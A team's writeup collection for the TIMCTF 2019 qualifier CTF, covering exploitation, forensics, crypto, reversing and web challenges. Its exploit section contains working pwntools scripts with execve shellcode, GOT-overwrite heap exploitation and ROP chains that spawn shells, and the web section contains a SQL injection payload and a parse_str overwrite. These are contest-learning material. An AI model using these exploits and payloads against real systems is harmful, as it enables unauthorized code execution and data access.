# WreckTheLine TIMCTF 2019 Quals Writeups

These aren't all my writeups. [Fedex](https://twitter.com/FetchDEX), [NextLine](https://twitter.com/ashuu_lee) and [adragos](https://twitter.com/adragosxyz) wrote many of the following writeups, but we didn't keep track of who wrote what.

## Exploit

### Hiss hiss python

```py
int(eval(compile('print open("flag.txt", "r").readlines()', '<string>', 'exec')) or 0)
['TIMCTF{h1ss_h1ss_shell}']
Try again!
```

Flag = TIMCTF{h1ss_h1ss_shell}


### Swag

This was another pretty straight forward challenge.
Just run the exploit code a few times till the local seed matches the remote seed which will result in a successful buffer overflow. From this point, the task becomes a classic ROP challenge: leak libc, pivot in bss, call one_gadget.


### Bof-server

```py
import binascii
from pwn import *
p = process('./bof-server')
p.readuntil('address: ')
leak = int(p.readuntil(',').split(',')[0], 16)
exp = binascii.unhexlify('31c048bbd19d9691d08c97ff48f7db53545f995257545eb03b0f05')
exp += 'A'*(0x108 - len(exp))
exp += p64(leak)
p.sendline(exp)
p.interactive()
```

Basic buffer overflow exploit challenge

Flag = TIMCTF{oooverfl0w}wwwWWW


### Team Manager

```py
from pwn import *

def conn():
    s = remote('89.38.208.144',11114)
    return s

s = conn()
sla = s.sendlineafter
sa = s.sendafter
context.log_level = 'debug'

def add(cnt, name, sk1, sk2, sk3, sk4, com):
    sla('0: Exit\n', '1')
    sla(') ', str(cnt))
    sla(': ', str(name))
    sla(': ', str(sk1))
    sla(': ', str(sk2))
    sla(': ', str(sk3))
    sla(': ', str(sk4))
    sla(': ', str(com))

def edit(cnt, name, sk1, sk2, sk3, sk4, com):
    sla('0: Exit\n', '3')
    sla(') ', str(cnt))
    sla(': ', str(name))
    sla(': ', str(sk1))
    sla(': ', str(sk2))
    sla(': ', str(sk3))
    sla(': ', str(sk4))
    sla(': ', str(com))

def view(idx):
    sla('0: Exit\n', '4')
    sla(') ', str(idx))

l = ELF('/lib/x86_64-linux-gnu/libc.so.6')
e = ELF('./timctf_manager')

add(1, 'A' * 8, 8, 8, 8, 8, 'B' * 8)
add(2, 'A' * 8, 8, 8, 8, 8, 'B' * 8)
pay = ('C' * 8 * 8) + p64(0x111) + 'B' * 0xf8
pay += p64(0x61) + p64(0x1234) * 4 + p64(0x602028)
edit(1, pay, 8, 8, 8, 8, 'B' * 8)
view(2)
s.recvuntil('Extra note/comment: ')
libc = u64(s.recv(6) + '\x00' * 2) - l.symbols['puts']

pay = ('C' * 8 * 8) + p64(0x111) + 'B' * 0xf8
pay += p64(0x61) + p64(0x1234) * 4 + p64(e.got['fwrite'])
edit(1, pay, 8, 8, 8, 8, 'B' * 8)
edit(2, '/bin/sh;', 8, 8, 8, 8, p64(libc + l.symbols['system']))

sla('0: Exit\n', '4')
sla(') ', str(2))

s.interactive()
```

Flag = TIMCTF{Heap_overfl0ws_are_really_B4D}


### Flag Manager

```py
from pwn import *
import sys

def conn():
    s = remote('89.38.208.144',11115)
    return s

s = conn()
sla = s.sendlineafter
sa = s.sendafter
l = ELF('/lib/x86_64-linux-gnu/libc.so.6')
e = ELF('./flag_manager01')

name = '%4$p.'.ljust(0x50,'A') + p64(0) + p64(0x00000000004008a3) + p64(e.got['puts'])
name += p64(e.plt['puts']) + p64(0x4006d7)
sla(': ', name)
sla(':','a')
s.recvuntil(' NOOOOOOOOO!\n')
s.recvline()
libc = u64(s.recv(6) + '\x00' * 2) - l.symbols['puts']
s.info("libc @ " + hex(libc)) 
name = '%25$p'.ljust(0x50,'A') + p64(0) + p64(libc + 0x10a38c)
sla(': ', name)
sla(": ", 'a')
s.interactive()
```

## Forensics

### Deleted File

Using the command `binwalk -e 10MB.jpg; cd _10MB.jpg.extracted; cd ext-root; cat * | grep TIM`
We can get the flag.
Flag = TIMCTF{Grep_has_no_power_here}

### Strange Image

We were given a xor-ed png using the key ‘z’. After xor-ing it back the flag could be found within the string of the file but ROT-ed using the key 3.
Flag = TIMCTF{Brav0_j0nule!}

### Tri-color QR

By using the program stegsolver we were able to extract all 4 qr-codes hidden within the color layers. After decoding each QR code, we got the flag.
Flag = TIMCTF{Th1s_is_A_4_part_flag}

## Crypto

### Proof Of Work

Using the python library `proofofwork` we can generate a suitable input like:

```py
import proofofwork

print(proofofwork.sha256("?????????????????????????????????????????????????????????0000000"))
# => Ucn4AAAA
```

### TimCTF gamblig service

I guesses the RNG seed was based on the system clock so if you make 2 connections at the same time, they will have the same seed and therefore generate the same numbers. Thus you can read a correct number from one connection and send it to the other to get the flag.

```py
from pwn import *

r1 = remote("89.38.208.143", 21023)
r2 = remote("89.38.208.143", 21023)

r1.sendlineafter("choice:", "1")
num = int(r1.recvline().strip())
print(num)

r2.sendlineafter("choice:", "2")
r2.sendlineafter("your guess:", str(num))

r2.interactive()
```

```
[+] Opening connection to 89.38.208.143 on port 21023: Done
[+] Opening connection to 89.38.208.143 on port 21023: Done
803968278
[*] Switching to interactive mode
Congratulations! Here is your reward: TIMCTF{Now_You_c4N_ch3at_aT_pacanele}
```

### Don't trust time

I understood you can easily solve this by going from the current timestamp backwards, but I just bruteforced all possible timestamps in C like so:

```c
#include <stdio.h>
#include <string.h>
#include <openssl/aes.h>
#include <openssl/sha.h>
#include <pthread.h>

#define thread_count 8
#define rounds 256
#define first_round 92
#define batch_size (256L*256*256*256/thread_count/rounds)

const char ct[48] = "\x76\x2d\x38\x7d\xb5\xd1\x79\x0b\x76\x49\x4d\xfb\xde\x00\xde\xb6"
"\xdf\xcd\x68\xec\x85\x8b\x89\xed\xe0\x11\xd0\xb4\x1f\x22\x10\x15"
"\x63\x75\x5d\x65\x68\x31\xaa\x15\x7e\x92\xe6\x80\x59\x1f\x0a\x44";

void worker(int *start_ptr) {
    int start = *start_ptr;
    for(int seed = start; seed < start + batch_size; seed ++) {
        unsigned char iv[16] = {0};
        unsigned char key[16];
        SHA1((const unsigned char *)&seed, 4, key);

        AES_KEY dec_key;
        AES_set_decrypt_key(key, 128, &dec_key);
        char dec[48];
        AES_decrypt(ct, dec, &dec_key);
        if(!strncmp(dec, "TIMCTF{", 7)) {
            printf("\n!!!!!!!!!!!!!!!!!! %x !!!!!!!!!!!!!!!!!!!\n", seed);

            AES_cbc_encrypt(ct, dec, 48, &dec_key, iv, AES_DECRYPT);
            printf("%s\n", dec);
        }
    }
}

int main() {
    pthread_t threads[thread_count];
    int td[thread_count];
    for(int r=first_round; r<rounds; r++) {
        printf("ROUND %d\n", r);
        for(int i=0; i<thread_count; i++) {
            td[i] = batch_size*i + batch_size*thread_count*r;
            pthread_create(&threads[i], NULL, worker, &td[i]);
            printf("%d ", i);
            fflush(stdout);
        }
        printf(" / ");
        fflush(stdout);
        for(int i=0; i<thread_count; i++) {
            pthread_join(threads[i], NULL);
            printf("%d ", i);
            fflush(stdout);
        }
        printf("\n");
        fflush(stdout);
    }

    return 0;
}
```

timestamp 0x5d6ea645: TIMCTF{D0_not_truST_ChRONos1234}


### Baby Crypto

By swapping each letter with 18 (key) positions, we can get the flag (aka caesar cipher)
Flag = TIMCTF{Julius_Caesar_w0uld_b3_proud}


### Strange Cipher

This was a simple brute-force challenge. We were given a ciphertext (ex. 4a d6 34 ec 75 62 63 20) which needed to be decoded. In order to do so, we had to bruteforce one character at a time.
Flag = TIMCTF{Y0u_really_make_A_diff3rence}

### 3 magic numbers

```py
#Sage math
p1 = 492876863
p2 = 472882049
p3 = 573259391

t1 = 53994433445527579909840621536093364
t2 = 36364162229311278067416695130494243
t3 = 31003636792624845072184744558108878

n = p1*p2*p3
N = pow(n,4)

P1 = pow(p1,4)
P2 = pow(p2,4)
P3 = pow(p3,4)

th1 = euler_phi(P1)
th2 = euler_phi(P2)
th3 = euler_phi(P3)

e2 = 2019
e3 = pow(2019,2019)
d2 = inverse_mod(e2,th2)
d3 = inverse_mod(e3,th3)

t2 = pow(t2,d2,P2)
t3 = pow(t3,d3,P3)

print crt([Integer(t1),Integer(t2),Integer(t3)],[Integer(P1),Integer(P2),Integer(P3)])
```

Flag = timctf{c0ngru3nc3s_4r3_s000o_c00l}


## Reverse Engineering

### Evil minecraft mod

The jar does some bytecode rewritin in the same manner that Vlad, the organizer,did in his project: https://github.com/avlad171/customnpc_inject

What the injected opcodes do is that they decrypt an exe file that is stored "encrypted" after the end of the PNG texture into a file named Forgelin-1.8.1.jar, then they open that program with a numerical argument, namely 69420911 lmao. The code uses that argument to AES decrypt some more code which sends the flag over the network to 3.3.3.3. If we don't wanna extract the binaries and stuff we can just open netcat, place a timctfblock, right click it and get the flag from the pcap.

### Strange jump

This binary sets a sigfpe handler and then does some operations which could, if given an empty string, raise a division by 0 error. In the handler it does some weird stuff then it calls std::sort() with a custom comparator function which base64 decodes the flag. That function contains an opaque predicate which prevents ida from decompiling it, namely:

```
push rax
xor rax, rax
jz ayy
add rsp, 4
ayy:
pop rax
```

This doesn't serve any functional purpose other than confusing the decompiler, so we can nop it out.

At the beginning of the function it loads `VElNQ1RGe2RlQzNwdDF2ZV9FeGNlUDB0aTBuX2g0bmRMZXJ9` and the rest base64 decodes it:

TIMCTF{deC3pt1ve_ExceP0ti0n_h4ndLer}

### Pipes

The code splits into two processes with a fork and then uses two pipes to send stuff from one process to the other. One of the pipes is used to send the user input from the parent to the child, then the child does some bitwise magic to the data and sends it back on te other pipe. Then the parent compares that to a hardcoded array.

The input bytes are processed like:

```
input_byte += 96;
rol(&input_byte, 2);
input_byte ^= 0x7Fu;
input_byte = ~input_byte;
result_dword = 237 * input_byte;
```

which is reversible:

```py
fl = ""
for q in [0x000035B2,0x0000B39A,0x000074A6,0x0000AD1F,0x0000BEB6,0x0000BEB6,0x00008817,0x000074A6,0x00008F7F,0x0000B0D3,0x0000BBEF,0x000074A6,0x0000B487,0x00009A9B,0x00003D1A,0x00008BCB,0x000074A6,0x00009A9B,0x00008F7F,0x000074A6,0x0000C357,0x000096E7,0x00008BCB,0x0000BBEF,0x00008BCB,0x000074A6,0x00009A9B,0x0000BFA3,0x000074A6,0x000035B2,0x0000B39A,0x000074A6,0x0000B487,0x0000232E,0x0000B487,0x0000145E,0x0000CE73,0x0000145E,0x00008BCB,0x000010AA]:
        q //= 237
        q ^= 0x80
        q = ((q >> 2) | (q << 6)) & 0xff
        q = q - 96
        fl += chr(q)
print(fl)
```

### Math

The code does the usual base64 encode which takes 3 input bytes and transforms them to 4 output bytes, but this time it xors the input bytes with DA BE EF, so the solution is just to base64 decode then xor back:

```
echo jveimeqpofewqY3chceAr+G6tPqKiM27u/CLhcbX7MPv | base64 -d | xortool-xor -f - -h DABEEF
```

### Boz Packer

This boi uses openssl to AES decrypt its code. Some unusual things are that the decryption code is stored in the rsrc section and that the DOS stub is overwritten to contain the decryption key: `r5u8x/A?D(G+KbPe` and the original entry point: 0x4014E0. I couldn't quite get python to decrypt the code properly so I just ran it in a debugger (taking care to bypass the simple anti-debug trick of reading BeingDebugged) and then dumped the decrypted code.

Looking at the decrypted code we can see that it stores a bunch of 32-long hex values (16 bytes) and then compares each to MD5(user_input[i]) for each byte of the user input. We can easily reverse this check:

```py
hashes = ["b9ece18c950afbfa6b0fdbfa4ff731d3",
"dd7536794b63bf90eccfd37f9b147d7f",
"69691c7bdcc3ce6d5d8a1361f22d04ac",

# -- snip -- #

"75d35fc172579f264c559b92a37a45d8",
"001729aeb2c3d5566625244982a2c23d"]

import hashlib

def md5(a):
        h = hashlib.md5()
        h.update(a)
        return h.hexdigest()

d = []
for i in range(256):
        d.append(md5(chr(i)))

plain = ""
for l in hashes:
        print(l)
        if l in d:
                plain += chr(d.index(l))
        else:
                plain += "?"

print(plain)

# => TIMCTF{BOZ_as_s33n_in_ecsc_upx_chall}
```

### Easy Rev

```py
flag = 'TIMCTF{ebgngrq13synt}'
finish = ''

for i in 'TIMCTF{ebgngrq13synt}':
    for j in range(96,123):
        if chr((j- 84)% 26 + 97) == i:
            finish += chr(j)
            break


print finish
print 'ebgngrq13synt'[::-1]
```

Flag = TIMCTF{rotated13flag}


### Baby Rev

By running `strings babyrev | grep TIM` we can get the flag.
Flag = TIMCTF{Wh0_know5_a5m_kn0ws_R3V}

## Web

### Not so empty website

The website has a HTML comment with the flag.

### Secret key of swag

The php function parse_str is unsafe because it sets local variables based on the query string.
Using this unfortunate "feature" we can create the $processed_key variable and set it to anything,
and if we don't set key to anything, it won't get overwritten by the program.

http://89.38.208.143:20002/index.php?action=login&processed_key=hax0r => TIMCTF{Welcome_M4N_of_SW4G}

### Admin panel

Simplest of SQL injections, just write

```
' or 1=1;-- -
```

in any of the email or password fields and get the flag.
